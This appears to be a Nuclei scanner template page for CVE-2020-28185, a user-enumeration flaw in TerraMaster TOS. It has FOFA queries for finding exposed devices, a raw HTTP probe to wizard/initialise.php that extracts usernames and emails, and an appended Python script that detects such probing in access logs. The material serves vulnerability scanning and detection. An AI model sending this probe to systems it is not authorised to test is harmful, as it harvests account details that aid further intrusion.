TerraMaster TOS < 4.2.06 - User Enumeration
ID: CVE-2020-28185
Severity: medium
Author: pussycat0x
Tags: cve2020,cve,terramaster,enum,tos,terra-master
Description
User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
YAML Source
id: CVE-2020-28185

info:
  name: TerraMaster TOS < 4.2.06 - User Enumeration
  author: pussycat0x
  severity: medium
  description: |
    User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
  impact: |
    An attacker can enumerate valid usernames, potentially aiding in further attacks.
  remediation: |
    Upgrade TerraMaster TOS to version 4.2.06 or later.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28185
    - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
    - https://www.terra-master.com/
    - https://github.com/ArrestX/--POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-28185
    epss-score: 0.00465
    epss-percentile: 0.75439
    cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: terra-master
    product: tos
    fofa-query:
      - '"TerraMaster" && header="TOS"'
      - '"terramaster" && header="tos"'
  tags: cve2020,cve,terramaster,enum,tos,terra-master

http:
  - raw:
      - |
        GET /tos/index.php?user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wizard/initialise.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}/tos/index.php?user/login

        tab=checkuser&username=admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"email":'
          - '"status":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body_2
        regex:
          - '"username":"(.*?)"'
          - '"email":"(.*?)"'
# digest: 4b0a00483046022100b8957760790781ac621ac812e594439be4480e889430f4781308294c83314954022100ce26b7e02df2b5488ee25d3d1262616114e6ed0fae1ace81c200391ec52f793b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-28185.yaml"
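For the defending side, the sketch below flags clients that send bursts of POST requests to wizard/initialise.php, the endpoint the template probes. It is an added example, not part of the template or the Nuclei project; the combined access-log format, the sample lines, the threshold and the window are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in "combined" access-log format (assumed format, documentation IPs).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:00:01 +0000] "GET /tos/index.php?user/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2024:10:00:02 +0000] "POST /wizard/initialise.php HTTP/1.1" 200 96 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2024:10:00:03 +0000] "POST /wizard/initialise.php HTTP/1.1" 200 41 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2024:10:00:04 +0000] "POST /wizard/initialise.php HTTP/1.1" 200 41 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2024:10:00:05 +0000] "POST /wizard/initialise.php HTTP/1.1" 200 97 "-" "curl/8.0"
203.0.113.20 - - [12/Mar/2024:10:05:00 +0000] "POST /wizard/initialise.php HTTP/1.1" 200 96 "-" "Mozilla/5.0"
203.0.113.20 - - [12/Mar/2024:10:20:00 +0000] "POST /wizard/initialise.php HTTP/1.1" 200 96 "-" "Mozilla/5.0"
"""

ENDPOINT = "/wizard/initialise.php"  # path taken from the template above
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) ')

def parse(line):
    """Return (ip, timestamp, method, path without query) or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]

def find_enumeration(lines, threshold=3, window=timedelta(seconds=60)):
    """Map each IP to its peak POST count on ENDPOINT within one window, if >= threshold."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse(line)
        # The username sits in the POST body, which access logs omit, so count requests.
        if rec and rec[2] == "POST" and rec[3] == ENDPOINT:
            hits[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in hits.items():
        stamps.sort()
        start = best = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window start forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG.splitlines()))
```
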